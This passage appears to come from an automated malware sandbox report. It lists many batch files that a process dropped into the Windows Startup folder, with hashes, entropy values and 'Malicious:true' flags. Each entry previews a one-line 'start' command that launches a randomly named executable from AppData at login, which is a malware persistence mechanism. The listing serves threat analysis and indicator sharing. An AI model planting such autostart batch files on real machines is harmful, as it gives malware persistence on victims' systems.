                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\UVLurWz0zwkQqd3HayB6HEY3.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6gL1gG7ldW7PoVRDY8vKo5tc.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.993798110439766
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5L3UHcXG8gwACHF:fE1923zycACl
                                                                                                                                                                                                                                                            MD5:2358ED0B660EF332BC83670D137AF8F7
                                                                                                                                                                                                                                                            SHA1:47E2857284252A40CBF8180B1BBA415C32CCAB80
                                                                                                                                                                                                                                                            SHA-256:4FF861E91B6BE05BB2FEB47A3DDF3AFA2DA473BD0D67C8C9E787EA40F41C82E1
                                                                                                                                                                                                                                                            SHA-512:7178D0FCF2548BFA0E101DBCD1E3B53717D7B5A2C8AA7B79BB17D2608CE9BE53C68C66F9ABCD42C674E37B41B452A393A0999E6B1F17DD55EBDFD6E729FB2AF4
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\nPQO8Z9byTKoW0YecEtJrQN4.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7brphmKFPcG9dvFk5ljwDtYq.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.972229896092237
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J52mxow3jLVF:fE19232mek
                                                                                                                                                                                                                                                            MD5:6ED719A867D397937466F891DAE00C8F
                                                                                                                                                                                                                                                            SHA1:3D46B442537A0B41697BDCC262C2DD9EA62D9348
                                                                                                                                                                                                                                                            SHA-256:7C45B4F20C0AFE1AA2B6ECDBA77719A1CE7DA624E4448AF685B26E5AFF9478C9
                                                                                                                                                                                                                                                            SHA-512:EB84D8C2D86F04D5D0EB71B734E9C567827EF8FB860895CEA8F7E9D12EF07BC3794E5ED53AA4A89D722C2DCE1F09ED3AB7FF64173C2BB03A38C02838B2D829BC
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lSYLKWCafZpx18kXQ49864p.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.746880788794847
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5xJd6souo5sNHFn:fE1923PAs7oI
                                                                                                                                                                                                                                                            MD5:F90E4ECA9FC17DFB86F41EF9A3971CB6
                                                                                                                                                                                                                                                            SHA1:2F40BE759CA018F7011B6A2687D92C191D7D06D7
                                                                                                                                                                                                                                                            SHA-256:48722499CE4B105B0343F2B186404EEF8D2C195382F493EB8C936E7283EF6470
                                                                                                                                                                                                                                                            SHA-512:E2E0AF9D85AD340CA2FD51B3132A6E038F30E2039F18FDB0080923EA057CD5D7F486BFA6CF147F8EE8B36CAB870DBCF2D2DA5AEF56AC78E6F65A64D5439CD9C8
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\Tll62OaP8oVLTcLcTrzOXqGl.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C7JK1QLd1HhpC2iu6FzaXx9e.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.7576648959686105
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5NAWdjQFIOsn:fE19238qx
                                                                                                                                                                                                                                                            MD5:12A3AC01C482E3CD920ACBA9E23963DE
                                                                                                                                                                                                                                                            SHA1:B1A51E4C85DC2F6F8A73698760B97310D951789B
                                                                                                                                                                                                                                                            SHA-256:D13191AC44DDCBCF8198F66DA448CF5DE49E3319C22A94B5B890979566328E9E
                                                                                                                                                                                                                                                            SHA-512:839B1F92D347BAAFDFF1B8417F5DC484596AFA113D2F480EA4DC1B2F14DE268905449B82D402AEA1219C6E6FB4D8EF891EFD08BA65EC655296D88692717D84DA
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\heli0xf9eUcd5qaTU2WhBrox.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CtKTLlY2LhR3aGX0PpowiHev.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.857944181806523
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J53IxWIARDJACln:fE1923YQIARDJNl
                                                                                                                                                                                                                                                            MD5:9396D70D3F00B7C991AE4B13827627D8
                                                                                                                                                                                                                                                            SHA1:55A903F3129C442296D44849F2133DDD3DA3BCB3
                                                                                                                                                                                                                                                            SHA-256:7F5A5D142F4BB122DB7CEEC98CC20491FE8212B82F23887CBFDAAF747BF0A743
                                                                                                                                                                                                                                                            SHA-512:0B110304096268C7B4F6861310F0229FC015A52953C3EFEFBB587445CEEDD99D8963DE7C35E355ACAA63A014010AEC3472D039A88E09E0E0C8FF2CCC4065A73E
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EQSWALPGSJbmdhZ5UXJP52TV.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.953015925121575
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J52UkKWsUQ4iF:fE19232lKZF
                                                                                                                                                                                                                                                            MD5:E56F0A0DAA05A9EB23D9BC12556527BD
                                                                                                                                                                                                                                                            SHA1:8118BDD2CB64469A3B68A3CC8E9424A1FF72F8BF
                                                                                                                                                                                                                                                            SHA-256:943FC6E8BF4B027BD6B8A5CC707234F130FBA9B8ECF75F0FFEBE195020C9C0F7
                                                                                                                                                                                                                                                            SHA-512:81F1471625C8908273A12DBA6690DCF21A3B98D61A4B96175021E4DBEBC45BCF1E41FC305B78D1E3576D8B74A5954457D3102F8894BF2691ED984AC44D6EEABE
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\SNePs0JIjHDOAKzI11CQ043K.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F4MKwilBLbDn1AvI4NJYim3J.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.8185886460613325
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5LtX7HV6Jl:fE1923pjVm
                                                                                                                                                                                                                                                            MD5:C4FE1266258AC7BB2C0EF5A2513ACBE4
                                                                                                                                                                                                                                                            SHA1:FB1E7DF1EBBCFCC0FD838B588791062A7255E002
                                                                                                                                                                                                                                                            SHA-256:44AC843014F20B772FE6A130BD52A35D25BB672FFE9A0660A4BB62D59C29F1A9
                                                                                                                                                                                                                                                            SHA-512:E2E5A77F3E6804F51BE5382F6D6FAB50C3DCFCF1F7C29B5FE2074D52740AF3E234F338CDC7A8A0FCA2C96D0763411C97EBDBCE1AFE7BACF1621CF83546F23D99
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\nqutQ9rgLeAHNtyWdA1aXp1F.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FYS7ZbtfMHg45nrX4x6uzB9u.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.883662311231956
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5nkpZWvHk4Al:fE1923AovzAl
                                                                                                                                                                                                                                                            MD5:676EE028CF9CCD609926D0B4A195599D
                                                                                                                                                                                                                                                            SHA1:7D2C2E4E8FCB548F60CC4DFE1D61FEA079099F7E
                                                                                                                                                                                                                                                            SHA-256:87E8EC1D923106923797EC0D1465A124B84BE9D4F459DEE48D42B447FD9A728B
                                                                                                                                                                                                                                                            SHA-512:05CD778392305C31DD29C4A260FE72B24DEAAEFEA0B58497E58BA91CAFA7C8439F83B6C7754170BBF2D62FB455E52E5D21399AC21A203028CD8183CE6C4F8E61
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\BDWPWht51PAB6sI39ee6Tgbk.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hx6FJnbZibFTuzR4KP9Slo6z.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):5.023796188584192
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5Uh9TOf2pVSUMyAln:fE1923ULCIVnMx
                                                                                                                                                                                                                                                            MD5:4B0FE8B27B760FACE7A7D056790B837A
                                                                                                                                                                                                                                                            SHA1:5525AB20DFC8F94DE4C72402599B19289CF940BB
                                                                                                                                                                                                                                                            SHA-256:4DE2DDC11DB3B5AC0DF54DD77AB2E168884CA77962ED9AADD91F1A2237682DFD
                                                                                                                                                                                                                                                            SHA-512:B640527F1AFD7908D0A5E318CA1B4A053AC73F00314D89EBA7A28EE64DE1A2EE4370A83D7452281F48ABC7D68321C82C518CA5D26E5EFEDE8FA0DBB722AAFF6C
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\1DHjR2vk6vS49GBZmU2Ta1ix.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I0bhPTX30r8P4G1lvu8sFzoW.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.990017217489903
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J58tSl0/wmOBnDjUz/LNln:fE19238x4mYDjULLv
                                                                                                                                                                                                                                                            MD5:EF78270711FF42BC5130205E56F1F302
                                                                                                                                                                                                                                                            SHA1:2511AB9CDA19F70026CEE224F1D26AC17A449CAE
                                                                                                                                                                                                                                                            SHA-256:7976C230EAB2D208C4929F2F657CB006BE4F8504E87D369A741E3FF5AB17033F
                                                                                                                                                                                                                                                            SHA-512:53343CF4117F8BA061CB3F8CD96710D066299EC80A2B99A5A31F0C8144A93BEE1F640D93F1936EF89E78638C0E3B5AF9A4A76FE8B94808452E52B93F4BB136E5
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\YHw4f8SZUCkdAWRXPfF1qOas.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MGSlOhBcAWKEdyehvoNbVoUR.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.925871146123145
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5jRPMKtpeCl:fE1923GCl
                                                                                                                                                                                                                                                            MD5:97D93F32EC5AD490B2A0D8941F9107A7
                                                                                                                                                                                                                                                            SHA1:CE19F0015872C85375308307E53F256BC17190A4
                                                                                                                                                                                                                                                            SHA-256:0B368FEF2A6CB882B952D0554D5EBABD8CEE06850BCF5AC3AA81711D16756E71
                                                                                                                                                                                                                                                            SHA-512:5E8C905E30008A3917B0292E148912C0ECBC8883FD494FE7F22388026741A716C7C13428B66E97CC908D587D2ACA6AD14E2A3D70744D66429F98188F2D99150F
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\FH9ZiJrSMFU3hHrXc5ibJbFE.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NWqXzpae1NGiof3fGaSCKwbn.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.909510474298477
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5j2b7NKNHF:fE1923q0NHF
                                                                                                                                                                                                                                                            MD5:1778C13F1FFD69804A339B6BD1BBDA6B
                                                                                                                                                                                                                                                            SHA1:8A716865A570209245C8950CC300566D8A6BC484
                                                                                                                                                                                                                                                            SHA-256:BBAFF5400D41B185F2E7CF61BB4A6B661C6ADF7AB35037AE7938367934232640
                                                                                                                                                                                                                                                            SHA-512:5F2FE9D1CE63BBF4E7A320DC7C7B208977528E547098966F0DBADECF24FA3B635CF3496C4F722E69921C07221071E6F266207EB7A7E10456329F6E636ACB27B2
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\FXJXJcvxtZRFvWakkN6k83di.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OUfj0Cjc8tUmuX1EJn2UDMRq.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.916513688522378
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5GKccqCdpikyJHF:fE1923G8JikqF
                                                                                                                                                                                                                                                            MD5:E4357BBBBEBDE8DC9DE423193088D727
                                                                                                                                                                                                                                                            SHA1:3B96F9996483902D309C8C684BC656BE12988958
                                                                                                                                                                                                                                                            SHA-256:BD8C3DF87ED74F7289AE713374407ABD4FD4683063DB95559280A1D753CE31C3
                                                                                                                                                                                                                                                            SHA-512:BCC26002ADCEFF21F8C7DDCD31C1E80B441AA315D4332E0D74FD397103B833CD62FA52FE5B72AC3A8A621FA7A7B52EEB4E44E2BB55DF43E6481D7D95A5E05E18
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\cUZyyg5Iay7EkA1LG3XxNCAW.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PSzSTrBAfql6s2xHwMaulb6g.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.993798110439767
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J59HvL0viFn:fE1923lvAviF
                                                                                                                                                                                                                                                            MD5:1ACCDE06BEFECDC3518B548AD15F497E
                                                                                                                                                                                                                                                            SHA1:28A26F4D93C0ABB6E9F47F26856868DD9C0FA913
                                                                                                                                                                                                                                                            SHA-256:B8C44E188490B6198BC0E8F3045DDC9C90EB071AE2AE0253B243C4E89F15378D
                                                                                                                                                                                                                                                            SHA-512:C789871918EC5EBCBF23D9C3F8C31DA3EAF0034EB19C54BABA2D48D9FD302FE4EEF86E8F55608CFB1865C2994CD36A64BB3FDF5BD7B4094C0EB1CDBE5AFD7A9F
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\XbJnQ7YPZT43Q5vvoXLuAoSq.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Qeq8y82NFzxmb0C1zqsQ9GIJ.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):5.029372753235095
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5VBeQwJkm:fE1923rezkm
                                                                                                                                                                                                                                                            MD5:48AF22467C9767CF1307A4A8D28E125C
                                                                                                                                                                                                                                                            SHA1:974DC682881009B4C5EDDD0AA07FB3770DBFDBF5
                                                                                                                                                                                                                                                            SHA-256:63F770284D956A54F1E56CD37A89AF8EB5CF33F3B62C9F198B665D9574D0027D
                                                                                                                                                                                                                                                            SHA-512:D57DAFDE6319E76C17D3F27DF07807BF7FE901413A6D47CD9CE76D50D006122C77446A3176DD4E4652763EF4AD97F98D98051932D338E3082B6FE05CD1F3C5AD
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\pdCLEldSyO5Ik39YE4kJVbXN.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RVMSz0xyVTk828VJXeNNyJ5X.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.822369539011195
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5vsvEHEt0FuOCln:fE1923XEeFNCl
                                                                                                                                                                                                                                                            MD5:E3670DD4690BF3379603771BBDC52554
                                                                                                                                                                                                                                                            SHA1:C865BEE010E36679CBCD064DC107D94234714FAE
                                                                                                                                                                                                                                                            SHA-256:DC351B2FA7690AD1241E088A3B9F176269D70BCB8805364FEBB98CEE8784365A
                                                                                                                                                                                                                                                            SHA-512:A81849A4F7B23CCB4FC0FEA66B28A506BACB6C8357E3083666E196E9ED0B8E3BDFA67871DFA330FFE35E559227619661C2C8798B04672F29ADF4C98A5ABD61E3
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\Jye7PnMsJdWwQaaabqxbHITx.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RhOTMLiWYdQ5cM559FjqYdxz.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.9028762822026195
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5SQ/WsI30sn:fE1923SQG0s
                                                                                                                                                                                                                                                            MD5:F2E312AF22BAB4474EDBDCB773B8956A
                                                                                                                                                                                                                                                            SHA1:255CC1835D06A559424544FAAB0AD36BFE69FB2F
                                                                                                                                                                                                                                                            SHA-256:64CE2E7994D531435B72EBE3ACE6C90F22DDE81007C3D93848B48600552395BA
                                                                                                                                                                                                                                                            SHA-512:8ED5778CF3DF8C5B3B06D7C92642C8ED85A6C509C5642F3AEDA0912C925550B49DEEA33C0F6852FE8B0DDE754DE28FEDD169DCCA129A3A4379DE31169E08C0BF
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\wHBfjqvEYiXClqcsZASJdtJJ.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V1FiUldszCzLAulbMss25ZN5.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.788590567916905
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5sYTl5TqWrmln:fE1923sYNqsml
                                                                                                                                                                                                                                                            MD5:2E4BB86D1746E8732058954E11223D75
                                                                                                                                                                                                                                                            SHA1:F2E5666DF6E8DF2435026BB5745C7565C888223E
                                                                                                                                                                                                                                                            SHA-256:C43531CCA99E69CB22904F5D6977D420494DBE0F450115B5CEE94ED74B92B8D2
                                                                                                                                                                                                                                                            SHA-512:DFED6BA897E24E0F610EF38C7DEE8C4EC8FE075B04B11AC79841AF0587C2514B45152089403865186BA52E4B5D8F9BF57B09A2B3F56BB20BEEADFAB6D7025A1C
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\IpW6W2Yjx6z6D3j66j3N2tH5.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asxkwIl5OZIGfxZm6YYVmkyp.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.973656545665237
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5tSqNL3o0R4mn:fE1923VN3o0R4m
                                                                                                                                                                                                                                                            MD5:5499561ADC96671865FC532BBED6C5AD
                                                                                                                                                                                                                                                            SHA1:292E72C93922875ACBB9EA73D7D7089968C3DE7A
                                                                                                                                                                                                                                                            SHA-256:EDE966D71691998DBCA424A790CE7575AB9EECA2F273FDF7655905992DAC22F0
                                                                                                                                                                                                                                                            SHA-512:92D97855B32B20F67EF23749321DAEC37A283746B73A95C5E2E1CB3A5E11E72E7B4BB0F77120883D941DA053AE1D9518613D1D3324928D9DB8EC67E11819E065
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\H7TIhgIvG1Yhal1QnwrEdA0q.exe"

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bKbfQedsHp5fPnIwSbgAXTGS.bat

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.862922975315049
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5s2omyEF:fE1923s0yEF
                                                                                                                                                                                                                                                            MD5:55FDA4FBD732D67BA7BB988D4E4EA57F
                                                                                                                                                                                                                                                            SHA1:E6E73C703BB1897B42782549ACB7E7281E772E6E
                                                                                                                                                                                                                                                            SHA-256:332E3DF7577E14982CF5C69E57C72FC30C05F9BF8844E6F004A836E58381E7FB
                                                                                                                                                                                                                                                            SHA-512:5EFCB398F8F96CD4CD28EE915C6D4C2C84BD89C21EFA5DCEAECF7C7860C3D76635BF9CF85D37038BF89C7F9293FCEB22654F07801F2EE1D563BFB2475F7D0415
                                                                                                                                                                                                                                                            Malicious:true
